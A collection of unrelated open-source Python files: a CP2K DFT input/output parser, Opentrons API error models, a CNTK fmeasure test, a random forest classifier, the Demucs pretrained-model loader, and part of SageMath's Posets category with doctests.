dft_command = f"mpirun -np {ncpus} {dft_command}"
# output.write_to_output(dft_command+'\n')
call(dft_command, shell=True)
os.remove(newfilename)
forces, energy = parse_dft_forces_and_energy(dft_out)
return forces, energy
def parse_dft_input(dft_input: str):
"""Parse CP2K input file prepared by the user
the parser is very limited. The user have to define things
in a good format.
It requires the "CELL", "COORD" blocks
:param dft_input: file name
:return: positions, species, cell, masses
"""
positions = []
species = []
cell = []
with open(dft_input) as f:
lines = f.readlines()
# Find the cell and positions in the output file
cell_index = None
positions_index = None
nat = None
# species_index = None
for i, line in enumerate(lines):
if "&CELL" in line:
cell_index = int(i + 1)
elif "COORD" in line and "END" not in line:
positions_index = int(i + 1)
elif "&END" in line and (positions_index is not None) and (nat is None):
nat = i - positions_index
# if 'ATOMIC_SPECIES' in line:
# species_index = int(i + 1)
assert cell_index is not None, "Failed to find cell in input"
assert positions_index is not None, "Failed to find positions in input"
assert nat is not None, "Failed to find number of atoms in input"
# Load cell
# TO DO: allow to mess up the order of A, B, and C
for i in range(cell_index, cell_index + 3):
cell_line = list(map(float, lines[i].split()[1:]))
cell.append(cell_line) # np.fromstring(cell_line[1:], sep=' '))
cell = np.array(cell)
# Check cell IO
assert len(cell) != 0, "Cell failed to load"
assert np.shape(cell) == (3, 3), "Cell failed to load correctly"
# Load positions
for i in range(positions_index, positions_index + nat):
pos_line = lines[i].split()
species.append(pos_line[0])
# positions.append(np.fromstring(pos_string, sep=' '))
positions.append(list(map(float, pos_line[1:])))
# Check position IO
assert positions != [], "Positions failed to load"
positions = np.array(positions)
# see conversions.nb for conversion from amu to md units
ele_mass = {
"H": 1.007900,
"He": 4.002600,
"Li": 6.941000,
"Be": 9.012200,
"B": 10.811000,
"C": 12.010700,
"N": 14.006700,
"O": 15.999400,
"F": 18.998400,
"Ne": 20.179700,
"Na": 22.989700,
"Mg": 24.305000,
"Al": 26.981500,
"Si": 28.085500,
"P": 30.973800,
"S": 32.065000,
"Cl": 35.453000,
"K": 39.098300,
"Ar": 39.948000,
"Ca": 40.078000,
"Sc": 44.955900,
"Ti": 47.867000,
"V": 50.941500,
"Cr": 51.996100,
"Mn": 54.938000,
"Fe": 55.845000,
"Ni": 58.693400,
"Co": 58.933200,
"Cu": 63.546000,
"Zn": 65.390000,
"Ga": 69.723000,
"Ge": 72.640000,
"As": 74.921600,
"Se": 78.960000,
"Br": 79.904000,
"Kr": 83.800000,
"Rb": 85.467800,
"Sr": 87.620000,
"Y": 88.905900,
"Zr": 91.224000,
"Nb": 92.906400,
"Mo": 95.940000,
"Tc": 98.000000,
"Ru": 101.070000,
"Rh": 102.905500,
"Pd": 106.420000,
"Ag": 107.868200,
"Cd": 112.411000,
"In": 114.818000,
"Sn": 118.710000,
"Sb": 121.760000,
"I": 126.904500,
"Te": 127.600000,
"Xe": 131.293000,
"Cs": 132.905500,
"Ba": 137.327000,
"La": 138.905500,
"Ce": 140.116000,
"Pr": 140.907700,
"Nd": 144.240000,
"Pm": 145.000000,
"Sm": 150.360000,
"Eu": 151.964000,
"Gd": 157.250000,
"Tb": 158.925300,
"Dy": 162.500000,
"Ho": 164.930300,
"Er": 167.259000,
"Tm": 168.934200,
"Yb": 173.040000,
"Lu": 174.967000,
"Hf": 178.490000,
"Ta": 180.947900,
"W": 183.840000,
"Re": 186.207000,
"Os": 190.230000,
"Ir": 192.217000,
"Pt": 195.078000,
"Au": 196.966500,
"Hg": 200.590000,
"Tl": 204.383300,
"Pb": 207.200000,
"Bi": 208.980400,
"Po": 209.000000,
"At": 210.000000,
"Rn": 222.000000,
"Fr": 223.000000,
"Ra": 226.000000,
"Ac": 227.000000,
"Pa": 231.035900,
"Th": 232.038100,
"Np": 237.000000,
"U": 238.028900,
"Am": 243.000000,
"Pu": 244.000000,
"Cm": 247.000000,
"Bk": 247.000000,
"Cf": 251.000000,
"Es": 252.000000,
"Fm": 257.000000,
"Md": 258.000000,
"No": 259.000000,
"Rf": 261.000000,
"Lr": 262.000000,
"Db": 262.000000,
"Bh": 264.000000,
"Sg": 266.000000,
"Mt": 268.000000,
"Rg": 272.000000,
"Hs": 277.000000,
}
# TO DO: allow customize mass
massconvert = 0.000103642695727
masses = {}
for ele in ele_mass.keys():
# Expects lines of format like: H 1.0 H_pseudo_name.ext
masses[ele] = ele_mass[ele] * massconvert
return positions, species, cell, masses
def dft_input_to_structure(dft_input: str):
"""
Parses a qe input and returns the atoms in the file as a Structure object
:param dft_input: input file to parse
:return: atomic structure
"""
positions, species, cell, masses = parse_dft_input(dft_input)
_, coded_species = struc.get_unique_species(species)
return struc.Structure(
positions=positions,
species=coded_species,
cell=cell,
mass_dict=masses,
species_labels=species,
)
def edit_dft_input_positions(dft_input: str, structure):
"""Write the current configuration of the OTF structure to the
qe input file
:param dft_input: intput file name
:param structure: structure to print
:type structure: class Structure
:return newfilename: the name of the edited intput file.
with "_run" suffix
"""
with open(dft_input, "r") as f:
lines = f.readlines()
file_pos_index = None
cell_index = None
nat = None
for i, line in enumerate(lines):
if "&CELL" in line:
cell_index = int(i + 1)
if "&COORD" in line:
file_pos_index = int(i + 1)
if "&END" in line and (file_pos_index is not None):
nat = i - file_pos_index
# if 'ATOMIC_SPECIES' in line:
# species_index = int(i + 1)
assert file_pos_index is not None, "Failed to find positions in input"
assert cell_index is not None, "Failed to find cell in input"
assert nat is not None, "Failed to find nat in input"
for pos_index, line_index in enumerate(
range(file_pos_index, file_pos_index + structure.nat)
):
pos = structure.positions[pos_index]
specs = structure.species_labels[pos_index]
pos_string = f"{specs} {pos[0]} {pos[1]} {pos[2]}\n"
if line_index < len(lines):
lines[line_index] = pos_string
else:
lines.append(pos_string)
# # TODO current assumption: if there is a new structure, then the new
# # structure has fewer atoms than the previous one. If we are always
# # 'editing' a version of the larger structure than this will be okay with
# # the punchout method.
# for line_index in range(file_pos_index + structure.nat,
# file_pos_index + nat):
# lines[line_index] = ''
lines[cell_index] = "A " + " ".join([str(x) for x in structure.vec1]) + "\n"
lines[cell_index + 1] = "B " + " ".join([str(x) for x in structure.vec2]) + "\n"
lines[cell_index + 2] = "C " + " ".join([str(x) for x in structure.vec3]) + "\n"
newfilename = dft_input + "_run"
with open(newfilename, "w") as f:
for line in lines:
f.write(line)
return newfilename
def parse_dft_forces_and_energy(outfile: str):
"""Get forces from a pwscf file in eV/A
the input run type to be ENERGY_FORCE
:param outfile: str, Path to dft.output file
:return: list[nparray] , List of forces acting on atoms
:return: float, total potential energy
"""
forces = []
total_energy = np.nan
startforce = -1
with open(outfile, "r") as outf:
for line in outf:
if line.find("FORCE_EVAL") != -1:
total_energy = float(line.split()[8])
if startforce >= 2:
if line.find("SUM") != -1:
startforce = -1
else:
line = line.split()[3:]
forces.append(list(map(float, line)))
startforce += 1
elif startforce >= 0:
startforce += 1
elif line.find("FORCES") != -1 and line.find("in") != -1:
startforce = 0
assert total_energy != np.nan, (
"dft parser failed to read the file {}. Run failed." + outfile
)
# Convert from ry/au to ev/angstrom
conversion_factor = 25.71104309541616 * 2.0
forces = np.array(forces) * conversion_factor
total_energy *= 27.2114
return forces, total_energy
def parse_dft_forces(outfile: str):
"""Get forces from a pwscf file in eV/A
:param outfile: str, Path to dft.output file
:return: list[nparray] , List of forces acting on atoms
"""
f, e = parse_dft_forces_and_energy(outfile)
return f
|
robot-server/robot_server/errors/error_responses.py | knownmed/opentrons | 235 | 12610013 | """JSON API errors and response models."""
from pydantic import BaseModel, Field
from pydantic.generics import GenericModel
from typing import Any, Dict, Generic, Optional, Sequence, Tuple, TypeVar
from robot_server.service.json_api import ResourceLinks
class ApiError(Exception):
"""An exception to throw when an endpoint should respond with an error."""
def __init__(self, status_code: int, content: Dict[str, Any]) -> None:
"""Intialize the exception.
Arguments:
status_code: The status code of the response
content: The JSON response body
"""
self.status_code = status_code
self.content = content
class BaseErrorResponse(BaseModel):
"""Base class for error response bodies."""
def as_error(self, status_code: int) -> ApiError:
"""Serialize the response as an API error to raise in a handler."""
return ApiError(
status_code=status_code,
content=self.dict(exclude_none=True),
)
class ErrorSource(BaseModel):
"""An object containing references to the source of the error."""
pointer: Optional[str] = Field(
None,
description=(
"A JSON Pointer [RFC6901] to the associated entity in the request document."
),
)
parameter: Optional[str] = Field(
None,
description="a string indicating which URI query parameter caused the error.",
)
header: Optional[str] = Field(
None,
description="A string indicating which header caused the error.",
)
class ErrorDetails(BaseErrorResponse):
"""An error response with error type and occurance details.
Extend this class to create specific error responses, and use it in your
route handlers.
Example:
from fastapi import status
from typing_extensions import Literal
from robot_server.errors import ErrorResponse, ErrorDetails
class BadRequest(ErrorDetails):
id: Literal["BadRequest"] = "BadRequest"
title: str = "Bad Request"
# ...
@router.get(
path="/some/path",
response_model=SomeModel,
responses={
status.HTTP_400_BAD_REQUEST: {"model": ErrorResponse[BadRequest]},
}
)
def get_some_model():
# ...
raise BadRequest.as_error(status.HTTP_400_BAD_REQUEST)
"""
id: str = Field(
...,
description="A unique identifier for this type of error.",
)
title: str = Field(
...,
description="A short, human readable name for this type of error",
)
detail: str = Field(
...,
description=(
"A human-readable message describing this specific occurance "
"of the error."
),
)
source: Optional[ErrorSource] = Field(
None,
description="An object containing references to the source of the error.",
)
meta: Optional[Dict[str, Any]] = Field(
None,
description=(
"An object containing non-standard information about this "
"occurance of the error"
),
)
def as_error(self, status_code: int) -> ApiError:
"""Serial this ErrorDetails as an ApiError from an ErrorResponse."""
return ErrorResponse(errors=(self,)).as_error(status_code)
ErrorDetailsT = TypeVar("ErrorDetailsT", bound=ErrorDetails)
class LegacyErrorResponse(BaseErrorResponse):
"""An error response with a human readable message."""
message: str = Field(
...,
description="A human-readable message describing the error.",
)
class ErrorResponse(BaseErrorResponse, GenericModel, Generic[ErrorDetailsT]):
"""A response body for a single error."""
errors: Tuple[ErrorDetailsT] = Field(..., description="Error details.")
links: Optional[ResourceLinks] = Field(
None,
description=(
"Links that leads to further details about "
"this particular occurrence of the problem."
),
)
class MultiErrorResponse(BaseErrorResponse, GenericModel, Generic[ErrorDetailsT]):
"""An response body for multiple errors."""
errors: Sequence[ErrorDetailsT] = Field(..., description="Error details.")
links: Optional[ResourceLinks] = Field(
None,
description=(
"Links that leads to further details about "
"this particular occurrence of the problem."
),
)
|
bindings/python/cntk/losses/tests/fmeasure_test.py | shyamalschandra/CNTK | 17,702 | 12610029 | <reponame>shyamalschandra/CNTK
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
"""
Unit tests for the fmeasure class.
"""
import numpy as np
import cntk as C
from _cntk_py import set_fixed_random_seed
import pytest
from os import environ
@pytest.mark.skipif(environ.get('TEST_TAG') is not None and environ['TEST_TAG'] in {'weekly', 'nightly'}, reason="Temporarily disabled this test in the Nightly/Weekly builds due to random failures.")
def test_fmeasure():
a = np.array([[[[1., 1., 1., 0., 0.],
[1., 1., 1., 0., 0.],
[1., 1., 1., 0., 0.],
[1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]]], dtype=np.float32)
b = np.array([[[[1., 1., 1., 0., 0.],
[1., 1., 0., 0., 0.],
[0., 0., 0., 1., 1.],
[0., 0., 0., 1., 1.],
[0., 0., 0., 0., 1.]]]], dtype=np.float32)
set_fixed_random_seed(1)
input_dim = (1, 5, 5)
input_tensor = C.input_variable(input_dim)
target_tensor = C.input_variable(input_dim)
z = C.fmeasure(input_tensor, target_tensor)
score = z.eval({input_tensor: a, target_tensor: b})
FMEASURE_EXPECTED_VALUES = [[[[0.5]]]]
assert np.allclose(score, FMEASURE_EXPECTED_VALUES)
|
Ch13/randomforest.py | jason-168/MLCode | 146 | 12610031 | <filename>Ch13/randomforest.py
# Code from Chapter 13 of Machine Learning: An Algorithmic Perspective (2nd Edition)
# by <NAME> (http://stephenmonika.net)
# You are free to use, change, or redistribute the code in any way you wish for
# non-commercial purposes, but please maintain the name of the original author.
# This code comes with no warranty of any kind.
# <NAME>, 2014
import numpy as np
import dtree
class randomforest:
"""The random forest algorithm based on the decision tree of Chapter 6"""
def __init__(self):
""" Constructor """
self.tree = dtree.dtree()
def rf(self,data,targets,features,nTrees,nSamples,nFeatures,maxlevel=5):
nPoints = np.shape(data)[0]
nDim = np.shape(data)[1]
self.nSamples = nSamples
self.nTrees = nTrees
classifiers = []
for i in range(nTrees):
print i
# Compute bootstrap samples
samplePoints = np.random.randint(0,nPoints,(nPoints,nSamples))
for j in range(nSamples):
sample = []
sampleTarget = []
for k in range(nPoints):
sample.append(data[samplePoints[k,j]])
sampleTarget.append(targets[samplePoints[k,j]])
# Train classifiers
classifiers.append(self.tree.make_tree(sample,sampleTarget,features,maxlevel,forest=nFeatures))
return classifiers
def rfclass(self,classifiers,data):
decision = []
# Majority voting
for j in range(len(data)):
outputs = []
#print data[j]
for i in range(self.nTrees):
out = self.tree.classify(classifiers[i],data[j])
if out is not None:
outputs.append(out)
# List the possible outputs
out = []
for each in outputs:
if out.count(each)==0:
out.append(each)
frequency = np.zeros(len(out))
index = 0
if len(out)>0:
for each in out:
frequency[index] = outputs.count(each)
index += 1
decision.append(out[frequency.argmax()])
else:
decision.append(None)
return decision
|
demucs/pretrained.py | KilianRuiz2B/demucs | 3,013 | 12610057 | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
# author: adefossez
import logging
from diffq import DiffQuantizer
import torch.hub
from .model import Demucs
from .tasnet import ConvTasNet
from .utils import set_state
logger = logging.getLogger(__name__)
ROOT = "https://dl.fbaipublicfiles.com/demucs/v3.0/"
PRETRAINED_MODELS = {
'demucs': 'e07c671f',
'demucs48_hq': '28a1282c',
'demucs_extra': '3646af93',
'demucs_quantized': '07afea75',
'tasnet': 'beb46fac',
'tasnet_extra': 'df3777b2',
'demucs_unittest': '09ebc15f',
}
SOURCES = ["drums", "bass", "other", "vocals"]
def get_url(name):
sig = PRETRAINED_MODELS[name]
return ROOT + name + "-" + sig[:8] + ".th"
def is_pretrained(name):
return name in PRETRAINED_MODELS
def load_pretrained(name):
if name == "demucs":
return demucs(pretrained=True)
elif name == "demucs48_hq":
return demucs(pretrained=True, hq=True, channels=48)
elif name == "demucs_extra":
return demucs(pretrained=True, extra=True)
elif name == "demucs_quantized":
return demucs(pretrained=True, quantized=True)
elif name == "demucs_unittest":
return demucs_unittest(pretrained=True)
elif name == "tasnet":
return tasnet(pretrained=True)
elif name == "tasnet_extra":
return tasnet(pretrained=True, extra=True)
else:
raise ValueError(f"Invalid pretrained name {name}")
def _load_state(name, model, quantizer=None):
url = get_url(name)
state = torch.hub.load_state_dict_from_url(url, map_location='cpu', check_hash=True)
set_state(model, quantizer, state)
if quantizer:
quantizer.detach()
def demucs_unittest(pretrained=True):
model = Demucs(channels=4, sources=SOURCES)
if pretrained:
_load_state('demucs_unittest', model)
return model
def demucs(pretrained=True, extra=False, quantized=False, hq=False, channels=64):
if not pretrained and (extra or quantized or hq):
raise ValueError("if extra or quantized is True, pretrained must be True.")
model = Demucs(sources=SOURCES, channels=channels)
if pretrained:
name = 'demucs'
if channels != 64:
name += str(channels)
quantizer = None
if sum([extra, quantized, hq]) > 1:
raise ValueError("Only one of extra, quantized, hq, can be True.")
if quantized:
quantizer = DiffQuantizer(model, group_size=8, min_size=1)
name += '_quantized'
if extra:
name += '_extra'
if hq:
name += '_hq'
_load_state(name, model, quantizer)
return model
def tasnet(pretrained=True, extra=False):
if not pretrained and extra:
raise ValueError("if extra is True, pretrained must be True.")
model = ConvTasNet(X=10, sources=SOURCES)
if pretrained:
name = 'tasnet'
if extra:
name = 'tasnet_extra'
_load_state(name, model)
return model
|
src/sage/categories/posets.py | UCD4IDS/sage | 1,742 | 12610070 | <filename>src/sage/categories/posets.py
r"""
Posets
"""
#*****************************************************************************
# Copyright (C) 2011 <NAME> <nthiery at users.sf.net>
#
# Distributed under the terms of the GNU General Public License (GPL)
# http://www.gnu.org/licenses/
#******************************************************************************
from sage.misc.cachefunc import cached_method
from sage.misc.abstract_method import abstract_method
from sage.misc.lazy_import import LazyImport
from sage.categories.category import Category
from sage.categories.sets_cat import Sets
class Posets(Category):
r"""
The category of posets i.e. sets with a partial order structure.
EXAMPLES::
sage: Posets()
Category of posets
sage: Posets().super_categories()
[Category of sets]
sage: P = Posets().example(); P
An example of a poset: sets ordered by inclusion
The partial order is implemented by the mandatory method
:meth:`~Posets.ParentMethods.le`::
sage: x = P(Set([1,3])); y = P(Set([1,2,3]))
sage: x, y
({1, 3}, {1, 2, 3})
sage: P.le(x, y)
True
sage: P.le(x, x)
True
sage: P.le(y, x)
False
The other comparison methods are called
:meth:`~Posets.ParentMethods.lt`, :meth:`~Posets.ParentMethods.ge`,
:meth:`~Posets.ParentMethods.gt`, following Python's naming
convention in :mod:`operator`. Default implementations are
provided::
sage: P.lt(x, x)
False
sage: P.ge(y, x)
True
Unless the poset is a facade (see :class:`Sets.Facade`), one can
compare directly its elements using the usual Python operators::
sage: D = Poset((divisors(30), attrcall("divides")), facade = False)
sage: D(3) <= D(6)
True
sage: D(3) <= D(3)
True
sage: D(3) <= D(5)
False
sage: D(3) < D(3)
False
sage: D(10) >= D(5)
True
At this point, this has to be implemented by hand. Once
:trac:`10130` will be resolved, this will be automatically
provided by this category::
sage: x < y # todo: not implemented
True
sage: x < x # todo: not implemented
False
sage: x <= x # todo: not implemented
True
sage: y >= x # todo: not implemented
True
.. SEEALSO:: :func:`Poset`, :class:`FinitePosets`, :class:`LatticePosets`
TESTS::
sage: C = Posets()
sage: TestSuite(C).run()
"""
@cached_method
def super_categories(self):
r"""
Return a list of the (immediate) super categories of
``self``, as per :meth:`Category.super_categories`.
EXAMPLES::
sage: Posets().super_categories()
[Category of sets]
"""
return [Sets()]
def example(self, choice = None):
r"""
Return examples of objects of ``Posets()``, as per
:meth:`Category.example()
<sage.categories.category.Category.example>`.
EXAMPLES::
sage: Posets().example()
An example of a poset: sets ordered by inclusion
sage: Posets().example("facade")
An example of a facade poset: the positive integers ordered by divisibility
"""
from sage.categories.examples.posets import FiniteSetsOrderedByInclusion, PositiveIntegersOrderedByDivisibilityFacade
if choice == "facade":
return PositiveIntegersOrderedByDivisibilityFacade()
else:
return FiniteSetsOrderedByInclusion()
def __iter__(self):
r"""
Iterator over representatives of the isomorphism classes of
posets with finitely many vertices.
.. warning:: this feature may become deprecated, since it does
of course not iterate through all posets.
EXAMPLES::
sage: P = Posets()
sage: it = iter(P)
sage: for _ in range(10): print(next(it))
Finite poset containing 0 elements
Finite poset containing 1 elements
Finite poset containing 2 elements
Finite poset containing 2 elements
Finite poset containing 3 elements
Finite poset containing 3 elements
Finite poset containing 3 elements
Finite poset containing 3 elements
Finite poset containing 3 elements
Finite poset containing 4 elements
"""
from sage.combinat.posets.posets import FinitePosets_n
n = 0
while True:
for P in FinitePosets_n(n):
yield P
n += 1
Finite = LazyImport('sage.categories.finite_posets', 'FinitePosets')
class ParentMethods:
@abstract_method
def le(self, x, y):
r"""
Return whether `x \le y` in the poset ``self``.
INPUT:
- ``x``, ``y`` -- elements of ``self``.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.le( 3, 6 )
True
sage: D.le( 3, 3 )
True
sage: D.le( 3, 5 )
False
"""
def lt(self, x, y):
r"""
Return whether `x < y` in the poset ``self``.
INPUT:
- ``x``, ``y`` -- elements of ``self``.
This default implementation delegates the work to :meth:`le`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.lt( 3, 6 )
True
sage: D.lt( 3, 3 )
False
sage: D.lt( 3, 5 )
False
"""
return self.le(x,y) and x != y
def ge(self, x, y):
r"""
Return whether `x \ge y` in the poset ``self``.
INPUT:
- ``x``, ``y`` -- elements of ``self``.
This default implementation delegates the work to :meth:`le`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.ge( 6, 3 )
True
sage: D.ge( 3, 3 )
True
sage: D.ge( 3, 5 )
False
"""
return self.le(y,x)
def gt(self, x, y):
r"""
Return whether `x > y` in the poset ``self``.
INPUT:
- ``x``, ``y`` -- elements of ``self``.
This default implementation delegates the work to :meth:`lt`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.gt( 3, 6 )
False
sage: D.gt( 3, 3 )
False
sage: D.gt( 3, 5 )
False
"""
return self.lt(y,x)
@abstract_method(optional = True)
def upper_covers(self, x):
r"""
Return the upper covers of `x`, that is, the elements `y`
such that `x<y` and there exists no `z` such that `x<z<y`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.upper_covers(3)
[6, 15]
"""
@abstract_method(optional = True)
def lower_covers(self, x):
r"""
Return the lower covers of `x`, that is, the elements `y`
such that `y<x` and there exists no `z` such that `y<z<x`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.lower_covers(15)
[3, 5]
"""
@abstract_method(optional = True)
def order_ideal(self, elements):
r"""
Return the order ideal in ``self`` generated by the elements
of an iterable ``elements``.
A subset `I` of a poset is said to be an order ideal if, for
any `x` in `I` and `y` such that `y \le x`, then `y` is in `I`.
This is also called the lower set generated by these elements.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.order_ideal([7,10])
[0, 1, 2, 3, 4, 5, 6, 7, 8, 10]
"""
@abstract_method(optional = True)
def order_filter(self, elements):
r"""
Return the order filter generated by a list of elements.
A subset `I` of a poset is said to be an order filter if, for
any `x` in `I` and `y` such that `y \ge x`, then `y` is in `I`.
This is also called the upper set generated by these elements.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.order_filter([3,8])
[3, 7, 8, 9, 10, 11, 12, 13, 14, 15]
"""
def directed_subset(self, elements, direction):
r"""
Return the order filter or the order ideal generated by a
list of elements.
If ``direction`` is 'up', the order filter (upper set) is
being returned.
If ``direction`` is 'down', the order ideal (lower set) is
being returned.
INPUT:
- elements -- a list of elements.
- direction -- 'up' or 'down'.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.directed_subset([3, 8], 'up')
[3, 7, 8, 9, 10, 11, 12, 13, 14, 15]
sage: B.directed_subset([7, 10], 'down')
[0, 1, 2, 3, 4, 5, 6, 7, 8, 10]
"""
if direction == 'up':
return self.order_filter(elements)
if direction == 'down':
return self.order_ideal(elements)
raise ValueError("Direction must be either 'up' or 'down'.")
def principal_order_ideal(self, x):
r"""
Return the order ideal generated by an element ``x``.
This is also called the lower set generated by this element.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.principal_order_ideal(6)
[0, 2, 4, 6]
"""
return self.order_ideal([x])
principal_lower_set = principal_order_ideal
def principal_order_filter(self, x):
r"""
Return the order filter generated by an element ``x``.
This is also called the upper set generated by this element.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.principal_order_filter(2)
[2, 3, 6, 7, 10, 11, 14, 15]
"""
return self.order_filter([x])
principal_upper_set = principal_order_filter
def order_ideal_toggle(self, I, v):
r"""
Return the result of toggling the element ``v`` in the
order ideal ``I``.
If `v` is an element of a poset `P`, then toggling the
element `v` is an automorphism of the set `J(P)` of all
order ideals of `P`. It is defined as follows: If `I`
is an order ideal of `P`, then the image of `I` under
toggling the element `v` is
- the set `I \cup \{ v \}`, if `v \not\in I` but
every element of `P` smaller than `v` is in `I`;
- the set `I \setminus \{ v \}`, if `v \in I` but
no element of `P` greater than `v` is in `I`;
- `I` otherwise.
This image always is an order ideal of `P`.
EXAMPLES::
sage: P = Poset({1: [2,3], 2: [4], 3: []})
sage: I = Set({1, 2})
sage: I in P.order_ideals_lattice()
True
sage: P.order_ideal_toggle(I, 1)
{1, 2}
sage: P.order_ideal_toggle(I, 2)
{1}
sage: P.order_ideal_toggle(I, 3)
{1, 2, 3}
sage: P.order_ideal_toggle(I, 4)
{1, 2, 4}
sage: P4 = Posets(4)
sage: all(all(all(P.order_ideal_toggle(P.order_ideal_toggle(I, i), i) == I
....: for i in range(4))
....: for I in P.order_ideals_lattice(facade=True))
....: for P in P4)
True
"""
if v not in I:
if all(u in I for u in self.lower_covers(v)):
from sage.sets.set import Set
return I.union(Set({v}))
else:
if all(u not in I for u in self.upper_covers(v)):
from sage.sets.set import Set
return I.difference(Set({v}))
return I
def order_ideal_toggles(self, I, vs):
r"""
Return the result of toggling the elements of the list (or
iterable) ``vs`` (one by one, from left to right) in the order
ideal ``I``.
See :meth:`order_ideal_toggle` for a definition of toggling.
EXAMPLES::
sage: P = Poset({1: [2,3], 2: [4], 3: []})
sage: I = Set({1, 2})
sage: P.order_ideal_toggles(I, [1,2,3,4])
{1, 3}
sage: P.order_ideal_toggles(I, (1,2,3,4))
{1, 3}
"""
for v in vs:
I = self.order_ideal_toggle(I, v)
return I
def is_order_ideal(self, o):
"""
Return whether ``o`` is an order ideal of ``self``, assuming ``self``
has no infinite descending path.
INPUT:
- ``o`` -- a list (or set, or tuple) containing some elements of ``self``
EXAMPLES::
sage: P = Poset((divisors(12), attrcall("divides")), facade=True, linear_extension=True)
sage: sorted(P.list())
[1, 2, 3, 4, 6, 12]
sage: P.is_order_ideal([1, 3])
True
sage: P.is_order_ideal([])
True
sage: P.is_order_ideal({1, 3})
True
sage: P.is_order_ideal([1, 3, 4])
False
"""
return all((u in self and all(x in o for x in self.lower_covers(u))) for u in o)
def is_order_filter(self, o):
"""
Return whether ``o`` is an order filter of ``self``, assuming ``self``
has no infinite ascending path.
INPUT:
- ``o`` -- a list (or set, or tuple) containing some elements of ``self``
EXAMPLES::
sage: P = Poset((divisors(12), attrcall("divides")), facade=True, linear_extension=True)
sage: sorted(P.list())
[1, 2, 3, 4, 6, 12]
sage: P.is_order_filter([4, 12])
True
sage: P.is_order_filter([])
True
sage: P.is_order_filter({3, 4, 12})
False
sage: P.is_order_filter({3, 6, 12})
True
"""
return all((u in self and all(x in o for x in self.upper_covers(u))) for u in o)
def is_chain_of_poset(self, o, ordered=False):
"""
Return whether an iterable ``o`` is a chain of ``self``,
including a check for ``o`` being ordered from smallest
to largest element if the keyword ``ordered`` is set to
``True``.
INPUT:
- ``o`` -- an iterable (e. g., list, set, or tuple)
containing some elements of ``self``
- ``ordered`` -- a Boolean (default: ``False``) which
decides whether the notion of a chain includes being
ordered
OUTPUT:
If ``ordered`` is set to ``False``, the truth value of
the following assertion is returned: The subset of ``self``
formed by the elements of ``o`` is a chain in ``self``.
If ``ordered`` is set to ``True``, the truth value of
the following assertion is returned: Every element of the
list ``o`` is (strictly!) smaller than its successor in
``self``. (This makes no sense if ``ordered`` is a set.)
EXAMPLES::
sage: P = Poset((divisors(12), attrcall("divides")), facade=True, linear_extension=True)
sage: sorted(P.list())
[1, 2, 3, 4, 6, 12]
sage: P.is_chain_of_poset([1, 3])
True
sage: P.is_chain_of_poset([3, 1])
True
sage: P.is_chain_of_poset([1, 3], ordered=True)
True
sage: P.is_chain_of_poset([3, 1], ordered=True)
False
sage: P.is_chain_of_poset([])
True
sage: P.is_chain_of_poset([], ordered=True)
True
sage: P.is_chain_of_poset((2, 12, 6))
True
sage: P.is_chain_of_poset((2, 6, 12), ordered=True)
True
sage: P.is_chain_of_poset((2, 12, 6), ordered=True)
False
sage: P.is_chain_of_poset((2, 12, 6, 3))
False
sage: P.is_chain_of_poset((2, 3))
False
sage: Q = Poset({2: [3, 1], 3: [4], 1: [4]})
sage: Q.is_chain_of_poset([1, 2], ordered=True)
False
sage: Q.is_chain_of_poset([1, 2])
True
sage: Q.is_chain_of_poset([2, 1], ordered=True)
True
sage: Q.is_chain_of_poset([2, 1, 1], ordered=True)
False
sage: Q.is_chain_of_poset([3])
True
sage: Q.is_chain_of_poset([4, 2, 3])
True
sage: Q.is_chain_of_poset([4, 2, 3], ordered=True)
False
sage: Q.is_chain_of_poset([2, 3, 4], ordered=True)
True
Examples with infinite posets::
sage: from sage.categories.examples.posets import FiniteSetsOrderedByInclusion
sage: R = FiniteSetsOrderedByInclusion()
sage: R.is_chain_of_poset([R(set([3, 1, 2])), R(set([1, 4])), R(set([4, 5]))])
False
sage: R.is_chain_of_poset([R(set([3, 1, 2])), R(set([1, 2])), R(set([1]))], ordered=True)
False
sage: R.is_chain_of_poset([R(set([3, 1, 2])), R(set([1, 2])), R(set([1]))])
True
sage: from sage.categories.examples.posets import PositiveIntegersOrderedByDivisibilityFacade
sage: T = PositiveIntegersOrderedByDivisibilityFacade()
sage: T.is_chain_of_poset((T(3), T(4), T(7)))
False
sage: T.is_chain_of_poset((T(3), T(6), T(3)))
True
sage: T.is_chain_of_poset((T(3), T(6), T(3)), ordered=True)
False
sage: T.is_chain_of_poset((T(3), T(3), T(6)))
True
sage: T.is_chain_of_poset((T(3), T(3), T(6)), ordered=True)
False
sage: T.is_chain_of_poset((T(3), T(6)), ordered=True)
True
sage: T.is_chain_of_poset((), ordered=True)
True
sage: T.is_chain_of_poset((T(3),), ordered=True)
True
sage: T.is_chain_of_poset((T(q) for q in divisors(27)))
True
sage: T.is_chain_of_poset((T(q) for q in divisors(18)))
False
"""
list_o = list(o)
if ordered:
return all(self.lt(a, b) for a, b in zip(list_o, list_o[1:]))
else:
for (i, x) in enumerate(list_o):
for y in list_o[:i]:
if (not self.le(x, y)) and (not self.gt(x, y)):
return False
return True
def is_antichain_of_poset(self, o):
"""
Return whether an iterable ``o`` is an antichain of
``self``.
INPUT:
- ``o`` -- an iterable (e. g., list, set, or tuple)
containing some elements of ``self``
OUTPUT:
``True`` if the subset of ``self`` consisting of the entries
of ``o`` is an antichain of ``self``, and ``False`` otherwise.
EXAMPLES::
sage: P = Poset((divisors(12), attrcall("divides")), facade=True, linear_extension=True)
sage: sorted(P.list())
[1, 2, 3, 4, 6, 12]
sage: P.is_antichain_of_poset([1, 3])
False
